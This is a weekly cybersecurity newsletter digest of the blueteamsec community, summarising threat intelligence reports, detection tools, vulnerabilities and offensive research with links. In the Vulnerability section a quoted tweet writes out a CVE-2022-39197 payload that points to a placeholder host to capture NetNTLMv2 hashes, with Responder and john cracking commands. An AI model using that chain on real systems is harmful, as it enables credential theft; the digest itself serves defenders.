Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.

Operationally this week you will see from the below lots is happening. Between the Lockbit ransomware builder leak and the arrest of a suspect behind the Uber and Rockstar breaches plus the volume of reporting below. It all makes it all feel a little busy…

In the high-level this week:

• INTERPOL Working Group highlighted cyber threats across the Americas - summary of a meeting but recognition of the threats faced by South America.

• Romania bans Russian antivirus software - specialists warn that the presence of Russian anti-virus software represents a vulnerability to the cyber security of the Romanian authorities and institutions. Other countries have done it previously but Romania has now moved on the topic.

• Delaware Court Of Chancery Dismisses Caremark Claims Alleging Breaches Of Fiduciary Duty Following A Cyberattack - US pension fund tried to litigate for cyber oversight failures which led to a breach. They failed because directors are not liable for “simple negligence” or in most cases, even gross negligence.

• ‘Assumptions and hypotheticals: Second edition’ which is a discussion piece between various experts covering the following three assumptions

  • Cyber Sovereignty

  • Cyber Attribution

  • Signalling De-escalation

• Department of Homeland Security (DHS) announced what they describe as a first-of-its-kind cybersecurity grant program specifically for state, local, and territorial (SLT) governments across the USA.

• White House published Remarks by National Security Advisor Jake Sullivan at the Special Competitive Studies Project Global Emerging Technologies Summit - “Protecting our tech innovation from theft or abuse also requires strong cybersecurity protections.  Through President Biden’s Executive Order on Improving the Nation’s Cybersecurity last year, and subsequent directives, we have taken a wide range of steps necessary to defend our nation from one of the most pressing threats to our economic and national security”.

• ‘Why NATO Countries Don’t Share Cyber Weapons’ - essay is based on No Shortcuts: Why States Struggle to Develop a Military Cyber-Force, published with Oxford University Press and Hurst Publishers.

• Untangling the Russian web: Spies, proxies, and spectrums of Russian cyber behaviour - some interesting perspectives/opinions - I will call them that as it isn’t clear what the empirical evidence base is.

• ‘A Retrospective Post-Quantum Policy Problem’ - I personally think this shows a lack of understanding as it assumes everyone uses RSA.

• National Academies of Sciences, Engineering and Medicine published a report on ‘Cryptography and the Intelligence Communication -The Future of Encryption’ - now this is interesting - “At the request of the Office of the Director of National Intelligence, this report identifies potential scenarios that would describe the balance between encryption and decryption over the next 10 to 20 years and assesses the national security and intelligence implications of each scenario.”

• The White House released their ‘Technical Evaluation For A U.S. Central Bank Digital Currency System’ - you can see we are inching to a world with a digital dollar.

  • Also related was ‘White House Releases First-Ever Comprehensive Framework for Responsible Development of Digital Assets’

• the US’s NIST published their ‘AI Risk Management Framework’

  • Related Czech Presidency puts forward narrower classification of high-risk systems as part of their AI Act.

• Stanford’s Cyber Policy Centre is running their fall seminar series featuring a variety of speakers who will discuss work and research on the intersection of free speech, democracy, security, and digital communication technologies

In the land of interesting jobs:

• The Atlantic Council is looking for a ‘Associate Director, Cyber Statecraft Initiative’ for a remote individual.

• The Royal Danish Defence College is hiring an assistant/associate professor on cybersecurity

Finally the travesty was that Lockbit allegedly paid $50,000 to the reporter of a crypto flaw in the ESXi variant which enabled decrypt. When our adversaries adopt bug bounty style rewards the world has arrived at an odd place.

Reflection this week is around the capital being invested in technology and the implications. It is an amazing time to be a technologist when foundations are dropping $200 Million investments in quantum computing for life sciences. Or where NIST and Google sign cooperative research and development agreements to develop and produce chips that researchers can use to develop new nanotechnology and semiconductor devices. 

It is clear our world is going to change quite radically in computing in the next 10 years..

Enjoying this? don’t get via e-mail? subscribe:

Think someone else would benefit? Share:

Share

Have a lovely Friday

Ollie

Cyber threat intelligence

Who is doing what to whom and how.

Ukraine

Russia-Nexus UAC-0113 Emulating Telecommunication Providers in Ukraine

Reporting on Russia activity using websites with JavaScript to facilitate ISO file delivery.

This report profiles the unique infrastructure used by the threat activity group UAC-0113, which is linked with moderate confidence by CERT-UA to Sandworm. The activity was identified through a combination of large-scale automated network traffic analytics and analysis derived from open source reporting. The report will be of most interest to individuals engaged in strategic and operational intelligence relating to the activities of the Russian government in cyberspace and network defenders.

https://www.recordedfuture.com/russia-nexus-uac-0113-emulating-telecommunication-providers-in-ukraine

GRU: Rise of the (Telegram) MinIOns

Russian information operations and loose links to DDoS capability. Actual tradecraft reporting is a little light, included more for fact of awareness.

• [We are] tracking multiple self-proclaimed hacktivist groups working in support of Russian interests. These groups have primarily conducted distributed denial-of-service (DDoS) attacks and leaked stolen data from victim organizations. Although some of these actors are almost certainly operating independently of the Russian state, we have identified multiple so-called hacktivist groups whose moderators we suspect are either a front for, or operating in coordination with, the Russian state.

• We assess with moderate confidence that moderators of the purported hacktivist Telegram channels “XakNet Team,” “Infoccentr,” and “CyberArmyofRussia_Reborn” are coordinating their operations with Russian Main Intelligence Directorate (GRU)-sponsored cyber threat actors. Our assessment is based in part on the deployment of GRU-sponsored APT28 tools on the networks of Ukrainian victims, whose data was subsequently leaked on Telegram within 24 hours of wiping activity by APT28, as well as other indicators of inauthentic activity by the moderators and similarities to previous GRU information operations.

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

MustangPanda – Enemy At The Gate

Vietnamese reporting on Chinese activity which seems to Venn in Ukraine and Europe.

In the second quarter of 2022, while hunting on VirusTotal’s platform, performing a search for specific byte patterns related to the Mustang Panda (#PlugX) group, I discovered a series of samples that we suspect to be of this group was uploaded from Vietnam. Parallel to the campaign that is believed to attack Vietnam, is a series of other campaigns of this group targeting events related to the European Union, the armed conflict that took place in Ukraine, events in countries like Montenegro, Bosnia and Herzegovina,…

Covering hunting process as well as analyze in-depth the techniques that the Mustang Panda group applied to infect the victim’s machine, thereby use as a springboard to conduct espionage activities and information theft.

https://kienmanowar.wordpress.com/2022/09/20/mustangpanda-enemy-at-the-gate/

https://github.com/m4now4r/Presentations/blob/main/MustangPanda%20-%20Enemy%20at%20the%20gate_final.pdf

New phishing campaign targets GitHub users

Worth noting domain doppelgangers is tradecraft we saw in the Okta attacks too. If you aren’t monitoring for the creation of such domains then you likely should be.

Reminder https://github.com/nccgroup/typofinder can help here.

On September 16, GitHub Security learned that threat actors were targeting GitHub users with a phishing campaign by impersonating CircleCI to harvest user credentials and two-factor codes. While GitHub itself was not affected, the campaign has impacted many victim organizations. Today, we are sharing details of what we’ve learned to help raise awareness of this phishing campaign and protect potential future victims.

https://github.blog/2022-09-21-security-alert-new-phishing-campaign-targets-github-users/

7 Years of Scarlet Mimic’s Mobile Surveillance Campaign Targeting Uyghurs

An Android mobile campaign from China which is still active. Interesting insights into their capability evolution and also the fact that mobile social engineering obviously works for them.

In 2022, [we] observed a new wave of a long-standing campaign targeting the Uyghur community, a Turkic ethnic group originating from Central Asia, one of the largest minority ethnic groups in China. This malicious activity, which we attributed to the threat actor Scarlet Mimic, was first brought to light back in 2016.

[We have] identified more than 20 samples of Android spyware called MobileOrder, with the latest variant dated mid-August 2022. As there are no indications that any of them were distributed from the Google Store, we can assume the malware is distributed by other means, most likely by social engineering campaigns.

https://research.checkpoint.com/2022/never-truly-left-7-years-of-scarlet-mimics-mobile-surveillance-campaign-targeting-uyghurs/

Chinese State-Sponsored Group TA413 Adopts New Capabilities in Pursuit of Tibetan Targets

Further Chinese activity with the following of note - Royal Road RTF weaponizer tool is used to exploit vulnerabilities in Microsoft Equation Editor - CVE-2017-11882, CVE-2018-0798, CVE-2018-0802 - and used to build the maldocs. Then these files hosted on the Google Firebase service which potentially complicates detection / blocking at a network level.

This report details multiple campaigns conducted by the likely Chinese state-sponsored threat activity group TA413. The activity was identified through a combination of large-scale automated network traffic analytics and expert analysis. This report will be of most interest to individuals and organizations with strategic and operational intelligence requirements relating to Chinese cyber threat activity, as well as humanitarian and other organizations concerned with Tibetan interests. With thanks to our colleagues at Sophos for early sharing and collaboration.

https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets

The Mystery of Metador | An Unattributed Threat Hiding in Telcos, ISPs, and Universities

Juan Andrés Guerrero-Saade once again shows why he is top of his game by outing this unattributed threat actor. A new player has apparently stepped on to the pitch going after telecommunications infrastructure. A few sloppy opsec mistakes however may end up being their undoing once the community warms up.

• [Our] researchers uncovered a never-before-seen advanced threat actor we’ve dubbed ‘Metador’.

• Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa.

• The operators are highly aware of operations security, managing carefully segmented infrastructure per victim, and quickly deploying intricate countermeasures in the presence of security solutions.

• Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. [Our] researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.

• At this time, there’s no clear, reliable sense of attribution. Traces point to multiple developers and operators that speak both English and Spanish, alongside varied cultural references including British pop punk lyrics and Argentinian political cartoons.

https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/

Analysis Report on Lazarus Group's Rootkit Attack Using BYOVD

We have reported on the increasing use of this technique by a variety of actors. Interesting that vendors are responding with detections because of it (see later). This reporting covers the Hermit Kingdoms use of what would have been thought of as a sophisticated capability used by the likes of Russia etc.

The rootkit malware identified in the recent product-disabling attack abused vulnerable driver kernel modules to directly read and write to the kernel memory area and accordingly, all monitoring systems inside the system including AV (Anti-Virus) were disabled.

This technique is called the “BYOVD (Bring Your Own Vulnerable Driver)” method and is known to be performed mainly on vulnerable driver modules of hardware supply companies. With the latest Windows OS, unsigned drivers can longer be loaded, however, attackers can use such legally-signed vulnerable drivers to control kernel area easily.

The vulnerable driver module used by the Lazarus Group, in this case, was a hardware-related module manufactured by “ENE Technology”.

https://asec.ahnlab.com/en/38993/

FBI/CISA: Iranian State Actors Conduct Cyber Operations Against the Government of Albania

Following on from last weeks full court press again Iran from the FIVEEYES this week we get details of the Albanian operation. The most information aspect is we learn initial access was via Microsoft SharePoint, exploiting CVE-2019-0604.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks.

https://www.cisa.gov/uscert/sites/default/files/publications/aa22-264a-iranian-cyber-actors-conduct-cyber-operations-against-the-government-of-albania.pdf

NSA, CISA: How Cyber Actors Compromise OT/ICS and How to Defend Against It

Press release:

The National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) published a Cybersecurity Advisory today that highlights the steps malicious actors have commonly followed to compromise operational technology (OT)/industrial control system (ICS) assets and provides recommendations on how to defend against them.

https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3167259/nsa-cisa-how-cyber-actors-compromise-otics-and-how-to-defend-against-it/

Advisory:

This joint Cybersecurity Advisory, which builds on previous NSA and CISA guidance to stop malicious ICS activity and reduce OT exposure, describes TTPs that malicious actors use to compromise OT/ICS assets. It also recommends mitigations that owners and operators can use to defend their systems. NSA and CISA encourage OT/ICS owners and operators to apply the recommendations in this CSA.

https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF

Void Balaur | The Sprawling Infrastructure of a Careless Mercenary

Tom Hegel further details an actor with transparent pricing, more so than most cyber vendors in fact. The point of note here is the clear hack for hire nature, where innovation happens others follow.

• The cyber mercenary group known as Void Balaur continues to expand their hack-for-hire campaigns into 2022 unphased by disruptions to their online advertising personas.

• New targets include a wide variety of industries, often with particular business or political interests tied to Russia. Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks. Their targets span the United States, Russia, Ukraine, and various other countries.

• Attacks are often very generic in theme, may appear opportunistic in nature, and account for targets making use of multi-factor authentication. The group seeks access to well-known email services (Gmail, Outlook, Yahoo), social media (Facebook, Instagram), messaging (Telegram), and corporate accounts.

• A unique and short-lived connection links Void Balaur’s infrastructure to the Russian Federal Protective Service (FSO), a low-confidence indication of a potential customer relationship or resource sharing between the two.

https://www.sentinelone.com/labs/the-sprawling-infrastructure-of-a-careless-mercenary/

Threat Actors Continue to Abuse Google Tag Manager for Payment Card e-Skimming

The scale of the active operation is the thing of note, but also interesting that 569 domains infected only yielded 165,000 records. These must be tiny small-medium-enterprises, which compounds the issue.

• As of this writing, all 3 GTM-based e-skimmer variants are currently being used to infect e-commerce domains and compromise customers’ payment card data.

• We identified 569 e-commerce domains infected with e-skimmers: 314 were confirmed to have been infected by a GTM-based e-skimmer variant, whereas the remaining 255 had infections that exfiltrated stolen data to malicious domains associated with GTM abuse.

https://www.recordedfuture.com/threat-actors-continue-to-abuse-google-tag-manager-for-payment-card-e-skimming

PrivateLoader: the loader of the prevalent ruzki PPI service

Point of note here is that the packages of installs are sold in bundles of thousands of installations. Shows how confident they are at being able to down on to the endpoints even with all the modern security practices.

The threat actor ruzki (aka les0k, zhigalsz) advertises their PPI service on underground Russian-speaking forums and their Telegram channels under the name ruzki or zhigalsz since at least May 2021. Their business model consists in selling bundles of thousand installations, located on systems all over the world, or specifically in Europe or in the United States.

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

New Malware in the Cloud By TeamTNT

Assaf Morag details a really interesting and novel campaign which is using the compromised compute apparently to crack encryption used in Bitcoin. If proven this is an interesting evolution and shows a degree of understanding. Be also interesting to see if it works..

The Pollard’s Kangaroo interval ECDLP solver algorithm appears to be an attempt to break the SECP256K1 encryption which is used by Bitcoin to implement its public key cryptography.

https://blog.aquasec.com/new-malware-in-the-cloud-by-teamtnt

Fake Telegram site delivering RAT aimed at Chinese Users

Point of note is the Windows Defender side loading tradecraft which we have covered previously being used by an actor active in China.

[We] identified a fake Telegram website masquerading as a legitimate website that downloads a malicious installer. This installer abuses the Windows Defender application to perform RAT operations. The below figure shows the fake Telegram website.

Upon executing the MSI file, it performs DLL side-loading using a genuine MpCmdRun.exe file and sideloads a malicious file mpclient.dll. The MpCmdRun.exe is a Windows defender component that usually loads a legitimate file mpclient.dll. In this case, the Threat Actor has replaced the legitimate mpclient.dll with a malicious file.

The loaded malicious DLL file further reads a file named upgrade.xml, decrypts it, and injects the code into %WINDIR%\System32\odbca32.exe to evade detection

https://blog.cyble.com/2022/09/17/fake-telegram-site-delivering-rat-aimed-at-chinese-users/

NetSupport RAT Distributed via SocGholish

Commercial tool being deployed by criminals for remote access in an attempt to avoid being flagged by endpoint detection. You have to wonder how much extra dual use we will see as endpoint protection improves.

SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.

This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.

Threat Actors (TAs) host a malicious website (the site displays content to lure end-users with critical browser updates) that implements a drive-by-download mechanism, such as JavaScript code or Uniform Resource Locator (URL) redirections, to download an archive file that contains malware.

https://blog.cyble.com/2022/09/21/netsupport-rat-distributed-via-socgholish/

Raspberry Robin’s Roshtyak: A Little Lesson in Trickery

Jan Vojtěšek provides some excellent analysis but also quantification of infection scale. The fact they managed to achieve over half a million deployments through infected removable drives is a thing of wonder.

[A] backdoor we dubbed Roshtyak, is not your typical piece of malware. Roshtyak is full of tricks. Some are well-known, and some we have never seen before. From a technical perspective, the lengths Roshtyak takes to protect itself are extremely interesting. Roshtyak belongs to one of the best-protected malware strains we have ever seen.

Roshtyak is the DLL backdoor used by Raspberry Robin, a worm spreading through infected removable drives. Raspberry Robin is extremely prevalent. We protected over 550K of our users from the worm this year.

https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/

FIN11 is Back : Impersonates Popular Video Conference Application Zoom

Two bits of reporting on the same campaign this week by FIN11. Interesting point is domain doppelgangers once again.

https://www.cyfirma.com/outofband/fin11-is-back-impersonates-popular-video-conference-application/

https://blog.cyble.com/2022/09/19/new-malware-campaign-targets-zoom-users/

Discovery

How we find and understand the latent compromises within our environments.

VeloCon 2022

10 videos from the conference about Velociraptor

https://www.youtube.com/playlist?list=PLz4xB83Y3VbhJjsvw75wPbNZcbiWA_L03

Detecting LSASS dumping with debug privileges

Olaf Hartong shows that defence research even into really common tradecraft has value. He shows how there are detection opportunities still waiting to be discovered.

There are several other methods of dumping credentials from the LSASS process, or carving it out live. A lot of them are (partially) detected out of the box, but still a substantial number are not. This detection only covers a specific implementation of the credential dumping technique.

https://medium.com/falconforce/falconfriday-detecting-lsass-dumping-with-debug-privileges-0xff1f-328fdb78f5be

Varc - Volatile Artifact Collector

Chris Doman and Adam Cohen Hillel release this capability to end incident response teams.

varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.

It creates a zip, which contains a number of different pieces of data to understand what is happening on a system:

• JSON files e.g. running processes and what network connections they are making

• Memory of running proccesses, on a per-process basis. This is also carved to extract log and text data from memory

• Netstat data of active connections

• The contents of open files, for example running binaries

We have successfully executed it across:

• Windows

• Linux

• OSX

• Cloud environments such as AWS EC2

• Containerised Docker/Kubernetes environments such as AWS ECS/EKS/Fargate and Azure AKS

• Even serverless environments such as AWS Lambda

https://github.com/cado-security/varc

How to Detect and Prevent impacket's Wmiexec

Stephan Wolfert again shows that detection research has value.

• Impacket, an open source collection of Python modules for manipulating network protocols, contains several tools for remote service execution, Windows credential dumping, packet sniffing and Kerberos manipulation.

• [We have] seen an increased use of Impacket’s wmiexec module, primarily by ransomware and eCrime groups.

• Wmiexec leaves behind valuable forensic artifacts that will help defenders detect its usage and identify evidence or indication of adversary activity.

https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/

Velociraptor 0.6.6 Release

New release as their deployments scale.

Multi-tenant mode, password changes within the GUI and improvements to the process tracker make this a a big update for power Velociraptor users.

https://docs.velociraptor.app/blog/2022/2022-08-15-release-notes/

MISP 2.4.162 Release

New release from the team.

As of version 2.4.162, MISP includes a periodic summary feature allowing users to consult a summary based on a requested time-frame for data the user has access to.

Currently, the summaries can be generated for 3 different periods: daily, weekly and monthly and then sent to all users that subscribed to one of these periods.

https://www.misp-project.org/2022/09/13/MISP.2.4.162.released.html/

Defence

How we proactively defend our environments.

A Guide to Improving Security Through Infrastructure-as-Code

Viktor Gazdag from NCC Group provides an extensive on how to improve security through IaC. With over 80 third party references this is a must read guide for anyone looking at how to automate security in an Infrastructure as Code world.

The good news is that there are a lot of information and tools available today for anyone who would like to automatically deploy infrastructure resources with built-in security in the cloud by developing secure infrastructure as a code. This article aims to make an attempt to collect the main starting points, creating a guide on how to integrate security into infrastructure as a code and show how these security checks and gates, tools and procedures secures the infrastructure by mentioning free and/or open-source tools wherever possible.

https://research.nccgroup.com/2022/09/19/a-guide-to-improving-security-through-infrastructure-as-code/

Stopping Vulnerable Driver Attacks

Joe Desimone shows how they have added 'first seen' to detect bring your own vulnerable driver style attacks.

Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the “New Terms” rule type, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.

This empowers security teams to quickly surface unusual drivers the first time they’re seen in their environment. This supports a detection opportunity for even previously unknown vulnerable drivers or other driver-based adversary tradecraft.

https://www.elastic.co/security-labs/stopping-vulnerable-driver-attacks

How to kick off an investigation for a compromised SaaS account

Johann Scheepers outlines from PushSecurity how to run an investigation end to end resulting from an OAuth illicit grant on Microsoft Office 365.

While the process isn’t exactly straightforward, catching early indicators like malicious mail rules helps you prevent an attacker from launching additional attacks like phishing campaigns as they try to gain access to sensitive business data. Removing the mail rule is just the start of the process, you really need to revoke permissions and take the other steps we covered in this post to stop an attack from going any further.

https://pushsecurity.com/blog/how-to-kick-off-an-incident-response-investigation-for-a-compromised-saas/

SOC tasks in Microsoft Sentinel

Daniel Chronlund provides a useful collection of information on how to run a Sentinel SOC in terms of regular tasking.

The official Microsoft recommendations (and some of the authors own recommendations) for daily, weekly, and monthly SOC activities.

https://danielchronlund.com/2022/09/21/microsoft-sentinel-soc-activities/

Open Cybersecurity Schema Framework

We have too many schemas, what we need is... another schema

The Open Cybersecurity Schema Framework is an open-source project, delivering an extensible framework for developing schemas, along with a vendor-agnostic core security schema. Vendors and other data producers can adopt and extend the schema for their specific domains. Data engineers can map differing schemas to help security teams simplify data ingestion and normalization, so that data scientists and analysts can work with a common language for threat detection and investigation. The goal is to provide an open standard, adopted in any environment, application, or solution, while complementing existing security standards and processes

https://github.com/ocsf

Active Directory integration features in Ubuntu 22.04

Going to be great or a spectrum of tyre 🔥 for cyber defence as it allows the deployment of Group Policy Objects to Linux hosts.

https://ubuntu.com/engage/New-Active-Directory-integration-features

implemented via this client:

https://github.com/ubuntu/adsys

Micro Emulation Plans

From the Center for Threat Informed Defense.

This collection expands the impact of the Adversary Emulation Library by developing easy-to-execute adversary emulation content that targets specific behaviours and challenges facing defenders

https://github.com/center-for-threat-informed-defense/adversary_emulation_library/tree/v4.0/micro_emulation_plans

Vulnerability

Our attack surface.

Aruba ClearPass Policy Manager, Multiple Vulnerabilities

Escalation of Privilege; Remote: Arbitrary Command Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS), SQL Injection - ClearPass Policy Manager platform provides role-based and device-based network access control

https://support.hpe.com/hpesc/public/docDisplay?docLocale=en_US&docId=hpesbnw04362en_us

Cobalt Strike 4.7.1

Closes a detection technique for sleepmask and addresses an XSS in TeamServer

https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/

Exploitation was then shown here:

Jas502n @jas502n

#CVE-2022-39197 Cobalt Strike <html>< img src='file://x.x.x.x/netntlm2'%> python3 Responder.py -I eth0 john --format=netntlmv2 --wordlist=pass.txt creds.txt

4:41 AM ∙ Sep 23, 2022

---

238Likes92Retweets

Offense

Attack capability, techniques and tradecraft.

How we Abused Repository Webhooks to Access Internal CI Systems at Scale

Novel attack surface exploited by Omer Gil and Asi Greenholts which I suspect will be difficult for Attack Surface Management vendors to respond to.

Organizations take multiple measures to protect and limit access to self-hosted CI systems, with the IP restriction of the SaaS SCM vendors’ webhook services being one of these measures. However, as we demonstrated in this blog, this measure creates a false sense of security as any internet originating attacker can leverage SCM webhook infrastructure to send traffic towards internal CI systems and conduct malicious activities which range from obtaining valid CI credentials to running exploits and fully compromising the CI.

https://www.cidersecurity.io/blog/research/how-we-abused-repository-webhooks-to-access-internal-ci-systems-at-scale/

Bypassing FileBlockExecutable in Sysmon 14.0: A Lesson In Analyzing Assumptions

Denis Nagayuk & Francisco Dominguez identify some gaps in Symon’s coverage. We can expect Microsoft to fix some of these.

Recently (in August of 2022), the Sysinternals team released Sysmon 14.0 – a notable update of a powerful and configurable tool for monitoring Windows machines. While Sysmon already included a few valuable detection capabilities, the update introduced the first preventive measure – the FileBlockExecutable event (ID 27). This functionality targets malware that uses multi-stage deployment that drops executable files on disk. Sysmon detects, logs, and automatically deletes such files whenever they satisfy certain conditions.

https://www.huntandhackett.com/blog/bypassing-sysmon

Teamsniper

A tool to automate the finding of the goods.

Teamsniper is a tool for fetching keywords in a Microsoft Teams such as (passwords, emails, database, etc.).

https://github.com/xRET2pwn/Teamsniper

Stealing Access Tokens From Office Desktop Applications

More capability subverting the need for passwords.

While I was reading the recent article about how Microsoft Teams stores access tokens in plaintext, I asked myself if this issue extended to other Office applications. I knew that this should be somehow possible because Office applications are generally connected to a Microsoft account.

Update: This seems to only work against Desktop applications that are a part of a Microsoft 365 plan which is generally used by organizations.

https://mrd0x.com/stealing-tokens-from-office-applications/

Masquerading PEB

Capability to make detection more challenging by EDR and also cause likely some real headaches in incident response and/or telemetry analysis.

Maquerade any legitimate Windows binary by changing some fields in the PEB structure

https://github.com/D1rkMtr/MasqueradingPEB

Relaying YubiKeys

Some need work to pass around the second factor should you have an implant down on the right host.

We are not relaying actual physical YubiKeys, we are relaying the APDU packets that the server application wants to get signed by a private key to verify the identity of the authentication so this attack works on all PIV Smart Cards but a YubiKey was used during the testing so therefore the title.

https://cube0x0.github.io/Relaying-YubiKeys/

Exec Remote Assembly with AMSI and ETW patching

Designed to download and run payloads whilst disabling various detections. Detection of the execution cradle itself is the best but potentially high false positive strategy

https://github.com/D1rkMtr/ExecRemoteAssembly

Recreating an MSI Payload for Fun and no profit - as used by Gwisin Ransomware

Sunggwan Choi recreates this capability to help with validating detections work as intended.

This post contains my best effort to simulate the MSI payload of the Gwisin Ransomware analyzed in the Ahnlab ASEC (hereinafter ASEC) team's blog post. The threat actors used an MSI payload that used the command line arguments to execute the Gwisin ransomware. This post will focus on creating a simple Proof of Concept MSI payload and not focus on the ransomware part of the payload.  

https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/

Exploitation

What is being exploited.

Malicious OAuth applications used to compromise email servers and spread spam

More malicious OAuth activity in the real-world being used to compromise servers to send spam.

This recent attack involved a network of single-tenant applications installed in compromised organizations being used as the actor’s identity platform to perform the attack. As soon as the network was revealed, all the related applications were taken down and notifications to customers were sent, including recommended remediation steps.

This blog presents the technical analysis of this attack vector and the succeeding spam campaign attempted by the threat actor. It also provides guidance for defenders on protecting organizations from this threat, and how Microsoft security technologies detect it.

https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

CVE-2022-24086: Surge in Magento 2 template attacks

eCommerce platform being exploited.

The critical template vulnerability in Magento 2 (CVE-2022-24086) is gaining popularity among eCommerce cyber criminals. The majority of recent [our]forensic cases concern this attack method. In this article we share our findings of 3 template hacks, and hope it will help you if you are confronted with a similar attack.

https://sansec.io/research/magento-2-template-attacks

CVE-2022-36804 Bitbucket Server Vulnerability Analysis / Exploitation

Chinese walkthrough on exploiting this vulnerability.

The effect of the officially disclosed vulnerability is that command execution is only possible with read-only permissions. By enumerating all the git commands that can be constructed with read-only permissions, find a place for parameter injection, and construct malicious url access to cause arbitrary command execution.

https://mp-weixin-qq-com.translate.goog/s/_UE74oRCRNkowaFLQEeOvw?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

CVE-2022-40286: Exploiting a Seagate service to create a SYSTEM shell

Matthew shows end to end exploitation of this driver and service. Another candidate for bring your own vulnerable driver.

https://www.x86matthew.com/view_post?id=windows_seagate_lpe

Tooling and Techniques

Low level tooling for attack and defence researchers.

Unflattening ConfuserEx .NET Code in IDA

GovCERT Switzherland brings the chocolates..

we’re studying the ConfuserEx1 obfuscation mechanism of a Ginzo .NET sample. This class of obfuscator is known as code flatteners. We describe how it can dealt with it using a Python script within IDA Pro, a famous reverse-engineering tool.

https://www.govcert.ch/blog/unflattening-confuserex-code-in-ida/

PE Bear

Portable Executable reversing tool with a friendly GUI - new open source from Hasherezade

PE-bear is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.

https://github.com/hasherezade/pe-bear

Footnotes

Some other small (and not so small) bits and bobs which might be of interest.

• NIST release new security guidance: Implementing the Health Insurance Portability and Accountability Act (HIPAA) Security Rule: A Cybersecurity Resource Guide

• USENIX Best Papers ‘22 - best of the best

• Practical Guidance for IT Admins to respond after Ransomware attacks - nice guide for the non-cyber people out there.

• Private Eye: On the Limits of Textual Screen Peeking via Eyeglass Reflections in Video Conferencing - academic work, but interesting.

• CVSS: Ubiquitous and Broken - good summary of the challenges.

• My Heart Belongs to Kashmir - An Analysis of a Pro-Indian Army Covert Influence Operation on Twitter - from Stanford

• ‘Future Business Implications of a Balkanizing Internet’ - this outlines four scenarios and the various incentives of the competing parties - interesting thought piece - but not a super forecast.

• Efficient Proofs of Software Exploitability for Real-world Processors - evidence base is limited to simple software and basic memory corruption.

• Turning Your Computer Into a GPS Tracker With Apple Maps - fixed in 2 vulnerabilities in Apple Maps that allowed the extraction of the accurate location of the user without authorization

• Publication review report 74 regarding automated OSINT by the AIVD and MIVD - automated open source usage by Dutch intelligence

That’s all folks.. until next week..